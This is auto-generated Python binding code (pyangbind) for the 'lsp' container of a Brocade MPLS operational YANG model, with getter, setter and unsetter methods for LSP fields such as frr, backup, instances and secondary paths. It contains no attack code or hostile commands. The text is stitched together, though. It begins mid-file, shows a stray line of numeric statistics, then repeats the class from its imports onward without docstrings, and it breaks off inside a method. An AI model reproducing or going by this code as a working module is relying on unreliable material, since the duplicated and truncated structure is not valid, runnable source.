self.__forwarding = YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_frr(self):
"""
Getter method for frr, mapped from YANG variable /mpls_state/lsp/frr (container)
YANG Description: MPLS LSP FRR information
"""
return self.__frr
def _set_frr(self, v, load=False):
"""
Setter method for frr, mapped from YANG variable /mpls_state/lsp/frr (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_frr is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_frr() directly.
YANG Description: MPLS LSP FRR information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """frr must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__frr = t
if hasattr(self, '_set'):
self._set()
def _unset_frr(self):
self.__frr = YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_backup(self):
"""
Getter method for backup, mapped from YANG variable /mpls_state/lsp/backup (container)
YANG Description: MPLS LSP detail backup information
"""
return self.__backup
def _set_backup(self, v, load=False):
"""
Setter method for backup, mapped from YANG variable /mpls_state/lsp/backup (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_backup is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_backup() directly.
YANG Description: MPLS LSP detail backup information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """backup must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__backup = t
if hasattr(self, '_set'):
self._set()
def _unset_backup(self):
self.__backup = YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_instances(self):
"""
Getter method for instances, mapped from YANG variable /mpls_state/lsp/instances (list)
YANG Description: MPLS LSP instancses information
"""
return self.__instances
def _set_instances(self, v, load=False):
"""
Setter method for instances, mapped from YANG variable /mpls_state/lsp/instances (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_instances is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_instances() directly.
YANG Description: MPLS LSP instancses information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """instances must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__instances = t
if hasattr(self, '_set'):
self._set()
def _unset_instances(self):
self.__instances = YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_secondary_path(self):
"""
Getter method for secondary_path, mapped from YANG variable /mpls_state/lsp/secondary_path (list)
YANG Description: MPLS LSP secondary path information
"""
return self.__secondary_path
def _set_secondary_path(self, v, load=False):
"""
Setter method for secondary_path, mapped from YANG variable /mpls_state/lsp/secondary_path (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_secondary_path is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secondary_path() directly.
YANG Description: MPLS LSP secondary path information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secondary_path must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__secondary_path = t
if hasattr(self, '_set'):
self._set()
def _unset_secondary_path(self):
self.__secondary_path = YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
lsp_name = __builtin__.property(_get_lsp_name)
lsp_type = __builtin__.property(_get_lsp_type)
bypass_lsp_type = __builtin__.property(_get_bypass_lsp_type)
interface = __builtin__.property(_get_interface)
history = __builtin__.property(_get_history)
basic = __builtin__.property(_get_basic)
forwarding = __builtin__.property(_get_forwarding)
frr = __builtin__.property(_get_frr)
backup = __builtin__.property(_get_backup)
instances = __builtin__.property(_get_instances)
secondary_path = __builtin__.property(_get_secondary_path)
_pyangbind_elements = {'lsp_name': lsp_name, 'lsp_type': lsp_type, 'bypass_lsp_type': bypass_lsp_type, 'interface': interface, 'history': history, 'basic': basic, 'forwarding': forwarding, 'frr': frr, 'backup': backup, 'instances': instances, 'secondary_path': secondary_path, }
| 71.775472 | 784 | 0.72761 |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import basic
import forwarding
import frr
import backup
import instances
import secondary_path
class lsp(PybindBase):
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp_name','__lsp_type','__bypass_lsp_type','__interface','__history','__basic','__forwarding','__frr','__backup','__instances','__secondary_path',)
_yang_name = 'lsp'
_rest_name = 'lsp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__instances = YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__bypass_lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
self.__frr = YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__basic = YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__interface = YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__forwarding = YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__backup = YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__secondary_path = YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__history = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'lsp']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'lsp']
def _get_lsp_name(self):
return self.__lsp_name
def _set_lsp_name(self, v, load=False):
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name(self):
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_lsp_type(self):
return self.__lsp_type
def _set_lsp_type(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_type must be of a type compatible with lsp-type""",
'defined-type': "brocade-mpls-operational:lsp-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)""",
})
self.__lsp_type = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_type(self):
self.__lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
def _get_bypass_lsp_type(self):
return self.__bypass_lsp_type
def _set_bypass_lsp_type(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_type must be of a type compatible with bypass-lsp-type""",
'defined-type': "brocade-mpls-operational:bypass-lsp-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)""",
})
self.__bypass_lsp_type = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_type(self):
self.__bypass_lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
def _get_interface(self):
return self.__interface
def _set_interface(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__interface = t
if hasattr(self, '_set'):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_history(self):
return self.__history
def _set_history(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """history must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__history = t
if hasattr(self, '_set'):
self._set()
def _unset_history(self):
self.__history = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_basic(self):
return self.__basic
def _set_basic(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """basic must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__basic = t
if hasattr(self, '_set'):
self._set()
def _unset_basic(self):
self.__basic = YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_forwarding(self):
return self.__forwarding
def _set_forwarding(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """forwarding must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__forwarding = t
if hasattr(self, '_set'):
self._set()
def _unset_forwarding(self):
self.__forwarding = YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_frr(self):
return self.__frr
def _set_frr(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """frr must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__frr = t
if hasattr(self, '_set'):
self._set()
def _unset_frr(self):
self.__frr = YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_backup(self):
return self.__backup
def _set_backup(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """backup must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__backup = t
if hasattr(self, '_set'):
self._set()
def _unset_backup(self):
